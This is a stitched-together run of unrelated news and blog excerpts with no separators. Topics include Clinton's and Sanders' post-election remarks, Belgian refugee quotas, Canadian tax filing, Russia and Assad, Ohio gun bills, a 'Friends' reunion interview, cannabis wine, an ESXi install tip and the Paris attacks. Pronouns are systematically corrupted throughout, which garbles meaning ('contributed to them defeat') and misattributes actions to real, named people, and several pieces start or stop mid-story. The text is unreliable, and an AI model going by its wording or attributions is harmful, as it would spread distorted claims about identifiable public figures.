“And they did,” Edelman said on Wednesday. “She has always been able to figure out how to get done whatever had to be done.”
Facebook Twitter Pinterest Hillary Clinton receives a standing ovation at the Children's Defense Fund gala at the Newseum in Washington. Photograph: Chip Somodevilla/Getty Images
In closing, Clinton invoked their late mother, Dorothy Rodham, whose resilience in the face of a difficult childhood was a central part of their message on the campaign trail.
“I dream of going up to them and taking them in my arms and saying: ‘Look, look at me and listen. You will survive,'” Clinton said, their voice wavering. “‘You will have a family of your own – three children. And as hard as it might be to imagine, your daughter will grow up to be a United States senator, represent our country as secretary of state and win more than 62 million votes for president of the United States.'”
Clinton spoke shortly after their rival for the Democratic nomination, Bernie Sanders, vehemently denied claims that they had contributed to them defeat.
In a letter to the New York Times, Theda Skocpol, a professor of government and sociology at Harvard University, claimed Clinton's campaign had been undermined by Sanders during a bruising primary contest: “Mr Sanders' refusal to concede in a timely way as Hillary Clinton won many millions more votes and their constant harping that they were ‘corrupt' furthered Mr Trump's message and contributed to the conman's catastrophic victory.”
Sanders told an audience at a Politics and Prose event at George Washington University on Wednesday: “My campaign brought millions of people into the process, I suspect the overwhelming majority of whom ended up voting for Hillary Clinton.”
Noting emails from Clinton campaign chair John Podesta, published by WikiLeaks, Sanders added: “To say the very least, the DNC [Democratic National Committee] was not a neutral force in the campaign and we had to take on virtually the entire Democratic establishment. Do I think our campaign in a sense made Hillary Clinton a better candidate? Yeah, I do.”
By the end of the primary contest, they said, Clinton was against the Keystone pipeline and Trans Pacific Partnership trade deal and supported free college tuition. The Democratic platform is now the “most progressive” in US history, Sanders added.
Despite losing the nomination, Sanders received 18,183 write-in votes on election day in Vermont, according to its secretary of state's office, putting them third behind Clinton and Trump with nearly 5.7% of the vote.
On Wednesday Sanders was appointed to a junior role in the Senate Democrats' leadership team, responsible for outreach. During their speech, part of a book tour, they said the party should move away from centrist Clinton territory.
“Can you go out and raise substantial amounts of money from the wealthy and Wall Street and other powerful special interests and then convince the American people that you are on the side of workers and the middle class, or do you finally have to say that we are going to take on the oligarchs, we are going to take on Wall Street and the drug companies and the insurance companies and the corporate media, and we are going to bring millions of people together to create a very different type of party than currently exists? That is a fundamental difference that exists between Bill and Hillary Clinton and myself.”
Clinton and Obama urge Democrats to rebuild party after election defeat Read more
Sanders – who, like Trump, beat Clinton in states such as Michigan and Wisconsin – said Senate Democrats would be willing to work with the new president on economic issues that benefit working families. “Towards the end of the campaign they were actually using the term that many Democrats don't use. They were saying that they were going to be the champion of the American working class. Well, Mr Trump, we have a list of everything that you said, and we are going to hold you to account.”
But Sanders vowed to oppose bigotry, earning a huge cheer from the audience, many of them students. They called on Trump to rescind their appointment of Steve Bannon of the far-right Breitbart News as chief strategist, saying: “The president of the United States should not have a racist at their side. Unacceptable.”
Last September, three generations of the Green family - owners of the Hobby Lobby craft store chain and central plaintiffs in theSupreme Court Case - attended The Gathering 2013 along with a Christian nonprofit that played a supporting "air traffic control" role in the Hobby Lobby case and also litigated Conestoga Woods v. Sebelius. Also present at The Gathering 2013 was the National Christian Foundation, which has funded the law nonprofits that litigated both the Conestoga and Hobby Lobby cases.
Because gay rights was the initial analytic vantage point from which I began studying "The Gathering", this new CARE report of mine is packed with with material on The Gathering as a central hub of evangelical anti-LGBTQ activism. But this concerns far more than gay rights. As I describe in my report,
"[The Gathering is] a community of quietly but deeply radical billionaire Christian patrons helping bankroll a mounting global onslaught against LGBT rights, who have led attacks on public schools and unions and heavily fund creationism and global warming denialism".
The Gathering is now trying to re-brand itself - with two NYT op-ed writers scheduled to speak at The Gathering 2014. But funding of the culture wars by The Gathering foundations has, over the last decade, actually increased quite dramatically (see CARE report, The Gathering: The Religious Right's Cash Cow), and the Alliance Defending Freedom - which has participated in the World Congress of Families and worked with Russian legislators pushing anti-gay legislation - gave a presentation at The Gathering 2013.
On other politics of The Gathering - one interesting fact which says a lot is that the Winter 2005 issue of The Gathering's quarterly newsletter featured an op-ed from a Christian Reconstructionist pastor who argued that disobedient and morally incorrigible children should be executed, per Leviticus 20:9. The pastor argued that Jesus held that position. The Gathering has extensive ideological and organizational links to the Christian Reconstructionism movement.
The largest foundation which attends The Gathering - the National Christian Foundation - gave out roughly $670 million in grants in 2013 and is now ranked the 12th biggest nonprofit foundation in America that raises money from private sources, according to the Chronicle of Philanthropy. NCF funding of anti-gay organizations and ministries, active from Uganda to Russia, is so extensive that I've taken to describing the NCF as the most prolific funder of anti-gay activism in the United States. One of my ongoing CARE projects has been the creation of a growing mini-encyclopedia just to catalog and describe all the anti-gay causes that the the National Christian Foundation bankrolls. ( see: The National Christian Foundation Anti-LGBT Funding Encyclopedia.)
I'd post the whole report here, but it's a bit too long. Some other useful bits:
The Belgian government has prepared a plan for the forced resettlement of refugees in the country, according to the Belgian news network RTBF.
The Belgian government will provide local authorities with migrant quotas , and municipal heads who refuse to receive refugees will be subject to a fine of 75 euros per day for each asylum seeker, the Belgian news network RTBF reported.
According to the RTBF, the quotas for the heads of the 589 Belgian municipalities are due to be issued before the end of April, with the government planning to summarize the results on November 1.
"'Bad students' will face sanctions in the form of a daily 75-euro fine. This money will be sent to those municipalities that receive more refugees than they are required. In a sense, this is a stick and carrot policy," the RTBF said.
The broadcaster added that it has no data on the total number of migrants to be resettled on Belgian territory.
Right now, about 35,000 asylum seekers are registered at temporary and permanent refugee centers across Belgium.
According to the EU border agency Frontex, around 1.8 million migrants entered the territory of the EU in 2015.
Most of them prefer to go to Greece via Turkey and then proceed onward to wealthier countries with more generous offers. More than 100,000 refugees have reportedly arrived in Greece in the past few months.
The European Commission said, for its part, that the current global migration crisis is the biggest such deadlock since the end of the Second World War.
After not filing their income taxes for three years, Janet Smith is struggling to find all the paperwork they need to send to the Canada Revenue Agency.
As someone with a low income, she's expecting to receive government benefits once their taxes are filed.
"That could probably help me make ends meet. Right now, being on disability and just scraping by, sometimes not even scraping by, it's pretty tough," they said.
This is a huge deal. Huge for families that are literally almost not being able to meet their basic needs on their income. And it's free, it's tax-free. — Franco Savoia, Vibrant Communities Calgary
"It's been a while since I filed taxes, there are a lot of new things that have come out since I last filed. A lot of benefits that I'm sure I qualify for that I'm missing out on."
The low income Calgarian is trying to find all the paperwork they need to finish their tax returns and qualify for government tax benefits and credits 0:39 Filing taxes is becoming the key strategy for organizations looking to lift people out of poverty. It's also a way to stimulate the economy in parts of the country in a downturn. The challenge is convincing low-income households to actually do their taxes, since that demographic has the lowest filing rate.
Families, in particular, are at risk of missing out on thousands of dollars of benefits and credits that are only accessed by completing a tax return.
"It's extremely important," said Franco Savoia, with the poverty reduction group Vibrant Communities Calgary. "This is a huge deal. Huge for families that are literally almost not being able to meet their basic needs on their income. And it's free, it's tax-free."
A family of four with both kids under five and a working annual income of $40,000 qualifies for more than $13,000 in Alberta, which offers its own tax credits.
"To me, if we have one family in Alberta that hasn't filed their taxes for 2015, we got to to get them to file it or else shame on us," said Savoia. "If every poor family actually filed their taxes, this could be life-changing. This is not small stuff."
Vibrant Communities Calgary considers a completed tax return as a poverty reduction strategy because of all the benefits to low income groups 0:37 For agencies like Savoia's, having poor people do their taxes is becoming the quickest way to help them get out of poverty. Government benefits are increasing, but without a tax return, you don't qualify.
How many miss out?
Several not-for-profit groups offer free tax clinics to help low-income people with the paperwork, but many still don't get their taxes done. Exactly how many is difficult to pinpoint.
The Toronto Daily Bread Food Bank found in a 2005 survey that 25 per cent of its users had not filed their taxes. Others suggest the rate could be lowed.
"Based on past experience, I think you could guess that about five to 10 per cent of low-income families are not getting the GST credit and the child tax benefit that they are entitled to," said Richard Shillington, a social policy researcher.
The CRA would not say how many families are not filing their taxes. Instead, the agency said it has issued more than 9.3 million Canada Child Benefit payments, totaling over $5.5 billion in the first three months of the program. The agency is on track to issue the $23 billion the federal government estimated for the first year of the program in the budget.
"We don't know exactly how many people don't get their tax returns filed. That would be of interest," said Gordon Turtle with the Chartered Professional Accountants of Alberta. The agency organizes several free tax clinics.
"We know from our own experience the tax clinics are well received by community groups and their clients," they said. "I think the accounting profession would be interested in this kind of statistics."
A boost during a downturn
If every low-income household filed their taxes, it could provide some much-needed economic stimulus in parts of the country struggling through a downturn.
"If they earn more, they will spend more," said Mary Moran with Calgary Economic Development. "That is on things that are basic to you and I, but they may see as a luxury such as cultural events, putting their kids in sports or buying new running shoes. Definitely, earning more has a direct impact on the economy."
Low-income families are more inclined than people in other income brackets to spend money locally because a higher percentage of their income goes to basic needs such as housing, food and utilities.
Tax credits and benefits can help during a downturn, according to Calgary Economic Development. 0:26 "We really do care about this," said Moran. "During an economic downturn, it makes it even more important because there's a large percentage of the population teetering on poverty."
Why not file?
Smith said they didn't file their taxes three years ago because all at once they suffered a business failure, one of their parents died and they had major back surgery. Getting the papers together for their taxes wasn't a priority. She's still trying to find all the documents they need to catch up.
"Dealing with health issues and emotional issues — it makes it tough," Smith said. "Enough was enough. I just had to put it off."
The sooner you do it, the better. The longer you wait, the worse it is going to get. — Janet Smith
They hope to finish their taxes soon, after doing the paperwork on and off for the last four months.
"It's going to feel phenomenal. I do have some debts that'll get paid out with any money I get back from this," they said. "The sooner you do it, the better. The longer you wait, the worse it is going to get."
Prosper Canada, a national charity, lists barriers to tax filing felt by people with low income:
Complexity
Low awareness of benefits available
Lack of mailed tax forms
Low computer access
Low literacy
Lack of access to advice
Newcomer status
Low self-confidence and trust
Difficulty assembling documents
The CRA does have copies of many documents someone needs to file their taxes such as T4s, T5s, RRSP receipts and some tuition records. They would not have charity receipts or health expense records, for example.
Free tax clinics are helpful, but some advocates, like Savoia, say much more needs to be done.
"We have to pull out all the stops, all the stops, to make sure that every single vulnerable family, every single vulnerable individual files their taxes."
The risk, they said, is that governments will see low participation rates and reduce or cancel programs like the child benefit.
PSNI detectives are due back in Northern Ireland this weekend with sealed copies of interviews given by a Belfast loyalist Winston Rea to a Boston College oral history project.
Three Appeal Court judges are due to rule next week if the PSNI will be allowed to examine the material.
These developments will be monitored closely by dozens of loyalists and republicans.
Between 2001 and 2006 they give interviews to an oral history project for the university.
They did so on the understanding that the material would not be made public while they were alive.
Three of the interviewees - republicans Brendan Hughes and Dolours Price and loyalist David Ervine - are dead.
But the PSNI is pursuing interviews given by people who are still alive.
One republican, Ivor Bell, was brought before the courts as part of that process.
In recent weeks, loyalist Winston 'Winkie' Rea has been trying to prevent the PSNI getting access to an interview they gave.
PSNI detectives are due back from Boston this weekend with a copy of that Winston Rea interview.
It was to be stored at the US consulate in Belfast - technically American soil - while the courts decided on the access issue.
But instead it is being kept in a sealed container at the courts building.
The Appeal Court judges are expected to rule next week if Rea can prevent the police from examining their interview material.
MOSCOW (Reuters) - President Bashar al-Assad was out of step with the views of their main ally, Russia, when they said they planned to fight on until they re-established control over all of Syria, Russia's envoy to the United Nations was quoted as saying on Thursday.
In the first public sign of cracks in the alliance between Moscow and Damascus, the envoy, Vitaly Churkin, said Russia had helped Assad turn the tide of the war so it was now incumbent on them to follow Russia's line and commit to peace talks.
Churkin said Russia was working toward a peaceful settlement for Syria, and that attempting to take back control over the whole country would be a futile exercise which would allow the conflict to drag on indefinitely.
Asked in an interview with Kommersant newspaper about Assad's comments that they would keep fighting until all rebels were defeated, Churkin said: “Russia has invested very seriously in this crisis, politically, diplomatically, and now also in the military sense.
“Therefore we of course would like that Bashar al Assad should take account of that.”
“I heard President Assad's remarks on television... Of course they do not chime with the diplomatic efforts that Russia is undertaking.... The discussions are about a ceasefire, a cessation of hostilities in the foreseeable future. Work is underway on this.”
Moscow and Damascus have been in lock-step since the end of September last year, when Russia launched air strikes on Syria which focused on attacking rebels opposed to Assad's rule.
The Russian strikes saved Assad's forces from imminent collapse and turned the tide of the fighting in their favor, exasperating the United States and its allies which have been working for years to defeat him.
Western diplomats expressed hope that Russia could use its influence over Assad to persuade them to start talks with armed opposition groups and eventually agree to step down.
Unofficial reports have emerged of Assad refusing to meet opposition figures proposed by Moscow as potential negotiating partners, but Churkin's remarks are the first public sign that Moscow is frustrated with Assad's reluctance to compromise.
On Assad's comments about fighting on in Syria, Churkin said in the interview: “In this case I think that we ought to be guided not by what they (Assad) says, with all my respect to the remarks of such a high-ranking person, but by what they do in the end.
“If the Syrian authorities... follow Russia's lead in the resolution of this crisis, then they have a chance to get out of it with their dignity intact.”
Russian Ambassador to the United Nations Vitaly Churkin speaks before a United Nations General Assembly vote addressing the economic, commercial and financial embargo imposed by the U.S. against Cuba at the United Nations headquarters in New York, October 27, 2015. REUTERS/Lucas Jackson
“But if in some way they are knocked off that path — and this again is my personal opinion — then a very difficult situation could arise. Including for the Syrians themselves. Because whatever the capabilities of the Syrian army, it was the effective operations of Russian air forces that allowed them to push their opponents back from Damascus.”
“If they take the position that they don't need any ceasefire, and they need to fight on to the end and to victory, then this conflict is going to carry on for a very long time. And it's frightening to imagine that,” Churkin said.
Chairman Ron Maag has announced that the House State Government Committee will be hearing testimony on multiple pro-gun rights bills this week.
On Wednesday, November 16 at 2:30 p.m. in Room 121, the committee will hear:
Propontent testimony on SB 199 (Active Duty Armed Forces Concealed Carry/ Handgun Transfer), which seeks to modify Ohio law to allow our active duty military to carry firearms while home on leave. Military members have long been people who obtained CHL's (Concealed Handgun Licenses) and carried, but members who are 18-20 years old are prohibited from obtaining a license. Police under the age of 21 are permitted to carry handguns. SB 199 will allow military members who have been trained to do the same thing.
Proponent testimony on HB 529 (Tactical medical professionals-firearms training), which seeks to provide for firearms training for tactical medical professionals; to permit such a professional who has received that training or comparable training and who is authorized to carry firearms by the law enforcement agency the professional is serving to carry firearms while on duty in the same manner, to the same extent, in the same areas, and subject to the same potential for civil and criminal liability as a law enforcement officer of the agency; and to grant such a professional, while on duty in that capacity, the same right to carry a concealed handgun in this state as a person who was issued a concealed handgun license.
On Thursday, November 17 at 10:00 a.m. in Room 121, the committee will hear:
Proponent/opponent/interested party testimony on SB 199 (Active Duty Armed Forces Concealed Carry/ Handgun Transfer) before a possible vote.
Sponsor testimony on HB 452, which seeks to modify Ohio law to generally permit a concealed handgun licensee to carry a concealed handgun in a place of worship.
Sponsor testimony on HB 518, which seeks to modify Ohio law to permit an elected officeholder of this state or a political subdivision of this state who holds a valid concealed handgun license to carry a concealed handgun in a government facility of this state or a political subdivision of this state.
If you want to see the General Assembly act to improve gun rights in ways that are already enjoyed by the majority of other states, call your Representative and Senator NOW and tell them you expect pro-gun legislation to move in Ohio BEFORE THE END OF THE YEAR. They asked for your vote on Election Day. Tell them we want their votes too.
Chad D. Baus is the Buckeye Firearms Association Secretary, BFA PAC Vice Chairman, and an NRA-certified firearms instructor.  They are the editor of BuckeyeFirearms.org, which received the Outdoor Writers of Ohio 2013 Supporting Member Award for Best Website.
There are certain songs that everyone wants in music games… Certain songs that people have been requesting since plastic instruments hit the North American shores in 2005. Rocksmith has finally knocked one of the most requested alternative rock songs off the list by giving us Radiohead's Paranoid Android.
This is not only the first official inclusion of Paranoid Android in a music game, but additionally the first time any song off Radiohead's acclaimed OK Computer has been added to a music game setlist. In fact, the request thread on RockBand's official forums for the full album reached almost 266 Pages! I could probably write forever about how awesome this song is, and how if you don't like it we probably shouldn't ever interact in real life, but instead I'll let the song speak for itself.
All we can hope is that Ubisoft has made tone-switching in Rocksmith 2014 automated.
Today I managed to attend one of the town halls sponsored by a key critic of the Democrats' health care reform, Sen. Jim DeMint of South Carolina. Well, I wasn't there in person, only in spirit -- thanks to a live web broadcast starting at noon via WSPA-TV. They covered their second town hall of the day, as they stood on a platform outside the Beacon Restaurant in Spartanburg.
The crowd was almost universally supportive, even worshipful, with one attendee hailing them for being considered the most conservative senator of all, and another urging them to run for president (he said they were "too smart" for that). The lies and misinformation that came both from the crowd and the stage probably exceeded what many might have imagined. And DeMint denounced the one person who pressed them with a tough question, saying they had come "fully" loaded with "Democratic talking points."
The same thing happened earlier in the day at their town hall in Greenville, when a woman raised some critical questions. DeMint referred to them as "talking points." Don't expect them to be criticized on Fox, a la Barney Frank, for "putting down" an attendee.
Also at Greenville they referred to the suspension of the cash for clunkers programs and asked, "what if the government had to suspend all surgeries'?
Here are some of the highlights of the Spartanburg town hall.
DeMint said that if the Democrats' plan goes through "hundreds of millions will lose Medicare" coverage.
One guy said insurance companies are NOT making big profits--only like 6% --and Obama was telling lies about it. DeMint agreed that profits not excessive.
DeMint said "non-partisan" analysts agree "a hundred million" will lose insurance at their jobs under Obama plan.
A woman quoted "Jewish spokesperson" Ben Stein as tracing the decline of America to taking prayer out of school. They declared that America was a "Christian" nation. DeMint said, "I can't add anything to that."
Another woman said they had a relative in London "who is dead because of national health care." And willing to document it.
When a questioner said that the Democrats wanted to cover illegals, DeMint said it sure looked that way and would no doubt happen if not checked.
A man said they wanted an ethics probe of David Axelrod, but did not say why. DeMint said a real concern but didn't want to get into it because "I am not partisan."
Finally, a woman stood up and politely asked why they continually put down government programs while also backing insurance companies. They quickly accused them of coming "loaded" with "Democratic talking points" as the crowd hooted.
DeMint closed by thanking the attendees for showing that they backed "taking back the government" -- and that they would try to help them get it back. They urged them to send letters to the editor, call Democratic members of congress-- or start a blog. *
Greg Mitchell's latest book, their ninth, is
".
 They are editor of
Editor & Publisher magazine.
When "Friends" came to an end after 10 seasons and 236 episodes in May 2004, 52.5 million viewers tuned in to say goodbye to Monica Geller (Courteney Cox), Chandler Bing (Matthew Perry), Rachel Green (Jennifer Aniston), Ross Geller (David Schwimmer), Phoebe Buffay (Lisa Kudrow) and Joey Tribbiani (Matt LeBlanc).
During a chat with more of comedy's leading men -- Jim Parsons ("The Big Bang Theory"), Jake Johnson ("New Girl"), Eric Stonestreet ("Modern Family"), Adam Scott ("Parks and Recreation") and Fred Armisen ("Portlandia" and "Saturday Night Live") -- for The Hollywood Reporter's Emmy roundtable (above), Perry admitted that they had it good back in the day on that comfy Central Perk couch and if they could, he'd go back.
"It's just really, really completely, completely a different thing," Perry said of working on NBC today versus in the "Friends" era at about the 18 minute mark. "It's all changed so much. I had no expectation of ['Go On'] even being close ... It just feels night and day."
After Parsons noted that "Friends" was a multi-camera, meaning Perry worked in front of a live audience, they said, "That show was ridiculous -- it's in front of a live audience, it was like a 10-4 kind of job, and we only worked a third of the time ... On my show, I work like 15 hours a day every day. And I was like, 'Why in the world did we stop?' We all decided, 'You know what? Let's stop.' I'd love to get in a time machine right now and go, 'Let's not stop.'"
"I don't think anyone wanted you to stop either," THR's interviewer Stacey Wilson noted.
"Friends" fans have been itching for a reunion or movie since the show ended and recently, they got a little bit of what they wanted. When Jennifer Aniston co-hosted the "The Ellen DeGeneres Show" in May, the "Friends" alumna stopped by Perry's place for some advice and found out they were sleeping with Courteney Cox as well as the talk show host and their wife Portia de Rossi.
During Aniston's time on "Ellen," the host and their wife Portia de Rossi, who was a guest, asked if they would do a proper "Friends" reunion. The actor admitted, "Doing that little bit with Matty and Court, we all were very nostalgic and miss working together and love each other ... It's a great thing to get to go back to your family like that and also know that people will love it and enjoy it."
Shortly thereafter, however, Perry was asked about a "Friends" movie or reunion on "Good Morning America" and they had this to say: "It would be terrible to do something and have it not be good ... It was so terrific ... If we did a ['Friends'] movie and it sucked, then it would, you know, blemish it.”
Do you think "Friends" should've continued? Would you want a movie or a reunion?
Portion Distortion
Do You Know How Food Portions Have Changed in 20 Years?
Anyone eating on the run or at restaurants has probably noticed that food portions have gotten larger. Some portions are called "super size," while others have simply grown in size and provide enough food for at least two people. With this growth have come increases in waistlines and body weight.
To see if you know how today's portions compare to the portions available 20 years ago, quiz yourself on Portion Distortion I (2003) and Portion Distortion II (2004). You will also learn about the amount of physical activity required to burn off the extra calories provided by today's portions.
We hope you find Portion Distortion insightful and fun. We also hope that next time you eat on the run, you will think twice about the food portions offered to you.
Portion Distortion Interactive Quizzes Slide Sets
A California state senator says they want to require all bicyclists to wear helmets for their safety.
Sen. Carol Liu on Wednesday announced a bill, SB 192, that will require bicycle riders to wear helmets or face a $25 fine.
“Any responsible bicycle rider should wear a helmet,” Liu said in a press statement. “This law will help protect more people and make sure all riders benefit from the head protection that a helmet provides.”
Liu's nephew, Alan Liu, was killed in 2004 by a drunk driver while riding in Sonoma County. Liu was wearing a helmet.
Sign Up and Save Get six months of free digital access to The Sacramento Bee
California has had a mandatory helmet law since 1994 for anyone under 18. Liu's bill also would require cyclists to wear reflective clothing when cycling at night.
Liu, in a press statement, cited a National Conference of State Legislatures report saying that 91 percent of bicyclists killed in 2009 reportedly were not wearing helmets. No states require helmets for adults, according to Liu's press release.
Dave Snyder, head of the California Bicycle Coalition, said their group just learned of the bill and has not talked to Liu yet, but hopes to encourage them to look for other ways to improve cycling, instead of requiring helmets.
“We think they have good intentions,” Snyder said. “We know that the most important thing to protect people who ride bikes is to get more people out there riding bikes. Forcing people to wear crash helmets when they ride is counterproductive to that goal.”
A man attacked two women who were getting off buses in Humboldt Park, cops said. (File photo) View Full Caption DNAinfo file photos/Tanveer Ali
CHICAGO — Cops said they're looking for a man who attacked a teen girl and a woman after they got off buses in the Humboldt Park neighborhood earlier this week.
In the first incident, which happened in the 1700 block of North Pulaski Road about 5:15 p.m. Monday, a 17-year-old was walking north on Pulaski Road after getting off a bus when a man came up to them from behind and put a hand over their mouth, according to a community alert from police.
They forced them into an alley and they fondled them before running off when the girl screamed and resisted him, according to the alert.
The next day, about 8:20 p.m., a 19-year-old woman got off a bus and walked west on Grand Avenue when a man approached them from behind, put their hands around their neck and forced them to the ground in the 4200 block of West Grand, the alert said.
But a passing car distracted him, and the woman was able to fight them off, according to the alert. They then took off, cops said.
According to cops, the assailant was described in both cases as a Hispanic man 20 to 25 years old, 5 feet to 5-foot-3 tall and weighing 120 to 130 pounds. They were last seen wearing a red, white and black hat with ear flaps and hanging strings along with a black puffy jacket and black pants, according to the alert.
Anyone with information is asked to call detectives at 312-744-8261.
In its second year, Operation Sandwich handed out nearly 2,500 meals last summer between June and August. Organizers expect that number to skyrocket as more people hear about the program.
On Monday, the first day of the 2014 summer program, volunteers handed out 34 lunches. "That's (34) kids who couldn't go to their fridge and get food for lunch," said Vicki Foss, one of the Operation Sandwich organizers.
That jumped to 69 meals Tuesday.
Operation Sandwich, which operates under the umbrella of United Way of Crow Wing and Southern Cass Counties, has already expanded to the Pequot Lakes/Breezy Point area. Organizers eventually want to bring meals to Crosby, too.
Operation Sandwich started after Foss volunteered at a local elementary school. It was there that a second-grader said they aren't looking forward to summer vacation because they would be hungry. After talking with a few teachers, Foss was told many students will hoard food in their desk as summer nears so they'll have something to eat when not in school.
Foss turned to their church, which in turn pulled in about nine other churches and organizations to help out.
The drop-off location sites were chosen based on the income of the surrounding houses.
The bag lunches each have a peanut butter and jelly sandwich, fruit or veggie and cereal bar or other snack.
More meals are typically handed out at the end of the month, Foss said. That's when family budgets get tighter and food can be harder to come by.
Community support continues to grow.
"I haven't met a single person who says it's OK for a kid to be hungry," Foss said.
That's why Sharon Chaney volunteers.
"I've always felt it's important to give back," they said. "Especially to kids."
Sometimes, though, sad stories are told to or seen by volunteers sometimes while handing out meals.
Foss recalled a 3-year-old who walked several blocks alone last year for a bag lunch.
"You'd be surprised what a 3- to 5-year-old will do if they're hungry," they said.
Some people aren't aware of the hunger problem in the Brainerd lakes area, said Jen Lindholm, coordinator of Operation Sandwich.
But as the word gets out and more awareness is spread, that shock will start to lower. Hopefully, so will the need for Operation Sandwich, they said.
Until that day, though, volunteers will keep on making peanut butter and jelly sandwiches, filling empty bellies one at a time.
BY THE NUMBERS:
Brainerd School District:
714 students on reduced lunch
2,058 students on free lunch
42 percent of total school population on free and reduced.
Pequot Lakes School District:
88 students on reduced breakfast/lunch
385 students are on free breakfast/lunch
35.7 percent of total school population on free and reduced.
Source: Operation Sandwich
Delivery information:
Days: Mondays, Tuesdays and Thursdays from June 9 - Aug. 28
Locations, times:
Brainerd:
Lowell Elementary: 11:45 a.m. to 12:10 p.m.
Lum Park: 12:15 to 12:40 p.m.
Harrison Elementary: 12:45 to 1:15 p.m.
Oscar Kristofferson Park, Baxter: 12 to 12:30 p.m.
Kiwanis Park: 12:40 to 1:10 p.m.
Pequot Lakes, Breezy Point:
Sibley Lake Park, Pequot Lakes: 12 to 12:30 p.m.
City Park, Breezy Point: 12 to 12:30 p.m.
Donate:
Needed: Fruit snacks, fruit cups, apples, oranges, clementines, crackers, carrots, broccoli.
Drop off sites: First Lutheran Church, 424 South 8th St., Brainerd.
Dollar General, 4225 West Grove St., Pequot Lakes.
Volunteer: www.operationsandwichcwc.org
This is real… now there's a new ‘Green Wine' called Canna Vine that is infused with cannabis.
Many cannabis enthusiasts are already used to enjoying the plant and drink together, and some wineries in California has successfully created and sold small batches. Canna Vine, however, is intended for the mass market. Made with high-end organically grown cannabis Indica and Sativa, the wine's creators hopes it will create uplifting and relaxing sensations.
Canna Vine is a commercially produced cannabis wine made by Californian winemakers. Canna Vine is the brainchild of Lisa Molyneux, owner of a Santa Cruz dispensary during a 2010 trip to Yosemite. During the trip they were introduced its medical benefits by Louisa Sawyer Lindquist who owns Verdad Wines in Santa Maria. Molyneux is a cancer survivor who eventually grew their own cannabis and established a shop, called Greenway, with the purpose of helping other cancer survivors.
They wanted to find an equal balance of “uplifting and relaxing sensations” with this wine. Reports say the process used to make this weed-infused wine is:
“Around a pound of marijuana. The weed is then wrapped in cheese cloth and added to a barrel of wine, where it sits for nearly a year to ferment and repose.”
Once bottled and ready, the wine delivers a mellow “body high” without the “mental high” caused by THC, a potent cannabinoid. Canna Vine currently retails at 120-440$ for half a litter to Californian medical marijuana users. However, the wine producers hope to make it available in other states too, where it's currently illegal to infuse cannabis in alcohol.
Until then, Lisa Molyneux and Louisa Sawyer Lindquist, the company owners, will continue to refine their product and uphold their high standards.
“Cannabis wine has been so effective as a stress reliever, as a mood elevator, and as a medicine,” Lindquist told the LA Times “I have no idea what the market will be like for it, but whatever I make I want to be safe, made from pure ingredients and, hopefully, delicious.”
Marijuana enthusiast and dispensary owner Lisa Molyneux explained that drinking weed-infused wine, also known as green wine, gives you a mellow, more physical body high, rather than a mental high.
‘There's a little flush after the first sip, but then the effect is really cheery, and at the end of the night you sleep really well. ‘It really is the best of both worlds; you get delicious wines with medicinal benefits.'
However, many doctors are concerned with the dangers of mixing marijuana and alcohol. Multiple studies are currently underway to find out if mixing the two is safe, and if so- in what quantities.
Christmas is just around the corner, and the agendas are filled up with social events for the holiday season. We are meeting up with friends and family, having dinners with colleagues and ex-colleagues… any excuse for a celebration is warmly welcomed. This year Coinffeine add another excuse for bitcoiners and developers; the launch of the Trial version. And since a next generation exchange platform for Bitcoin is not an everyday event, we hope that you can clear space in your already busy pre-holiday agendas.
We will celebrate our meetup Thursday 18th December at the very heart of the Letras neighborhood in Madrid. Those who come to the Impact Hub at 19.30, will see how the BitTorrent for your bitcoins actually work. And if you are interested in participating in our private testing, this is the place to be. We will give you the chance to try it for yourselves! The more of you that participate in this the better it is. The ten first advanced users that sign-up will leave the event with our software installed on their laptops, and we will gradually include more users as we advance in the process.
For us it is important that you play with the application, that you explore it, try it, leave it for a while, only to return to buy some more bitcoins. At this stage all your experiences, opinions and comments are valuable to us. It will help us to polish the application down to the very last line of code. Any thought or suggestion is useful. Do not worry about insisting on details, because patience has been one our trusted companions on this adventure…
We want to remark that it does not cost a penny to participate in the testing. We have been mining “bitcoins” from our own net for months, and the euros we give you are just mock-ups. So there are no excuses! Come and trade bitcoins for euros and vice versa with no strings attached! And for the ones of you that put in the most effort, we have prepared a small reward.
On top of this, we will share some pizzas, talk about our trip to Silicon Valley, network and clear out any doubts about Coinffeine…
Enough said, update your agendas:
Topic: Meetup Coinffeine.
Date: Thursday 18th December, 7:30 p.m.
Place: Impact Hub (C/ Alameda, 22, 28014 Madrid).
Sign-up is very easy!
Join: Yes!
Perfect, see you there!
So I've just deployed a Cisco UCS B Series system, which is on the HCL as supported by VMware for ESXi 6.0
However there is no install media available as for previous ESXi versions.
How to install ESXi 6.0 on Cisco UCS
Quite simple actually, I installed the Customised version of ESXi 5.5 update 2d onto the B series servers, and then deployed vCenter 6.0, after setting up update manager, I imported the standard ESXi 6.0 ISO, and upgraded the hosts using update manager.
After a week, I can report that I've found no issues with this at all.
I posted on reddit about the location or availability of the media, and someone suggested this method of install, furthermore another user stated their Cisco Account Manager said everything should work with the standard ESXi installs for the B200 M4 blades and not need additional drivers.
Hope this clears it up for some users who are hunting around for install media or an explanation that doesn't yet officially exist.
Regards
Dean
Follow @saintdle
Found this useful? Then share: LinkedIn
Email
Twitter
Facebook
Google
Reddit
Pinterest
Print
Like this: Like Loading...
Three days after the attacks on a soccer stadium, a concert hall and numerous bars and cafes, French and Belgian security services were focused on the radical jihadist they believe was the leader of the plot, Abdelhamid Abaaoud.  They are among the most prominent Islamic State fighters to have come out of Belgium.
A French official briefed on the investigation, who spoke on the condition of anonymity because they were not authorized to discuss operational details, said Mr. Abaaoud had mentioned plans to attack “a concert hall” to a French citizen who returned from Syria.
Mr. Abaaoud, this official said, had also been in contact with Ismaël Omar Mostefaï, one of the Paris attackers. Mr. Abaaoud also knew another attacker, Ibrahim Abdeslam; they were tried together in 2010 in Belgium for a minor offense.
Mr. Hollande said the attacks had been “planned in Syria, organized in Belgium, perpetrated on our soil with French complicity.”
Image Salah Abdeslam. Credit French Police, via Agence France-Presse — Getty Images
The French authorities said Monday that they had conducted 168 raids across the country in an effort to root out possible terrorist threats. The raids extended from the Paris region to the major cities of Lille, Lyon, Marseille and Toulouse, they said. They also said they had arrested 23 people and detained 104 others under house arrest.
But a Frenchman believed to be involved in the Paris attacks, Salah Abdeslam, 26, a brother of Ibrahim Abdeslam, remained at large, eluding a series of raids conducted by the authorities in Molenbeek, the working-class Brussels neighborhood where the brothers lived.
A third brother, Mohamed, and four other men who had been detained in Belgium were released on Monday. At a news conference in Brussels, Mohamed said they did not know Salah's whereabouts and added, “My parents are under shock and have not yet grasped what has happened.”
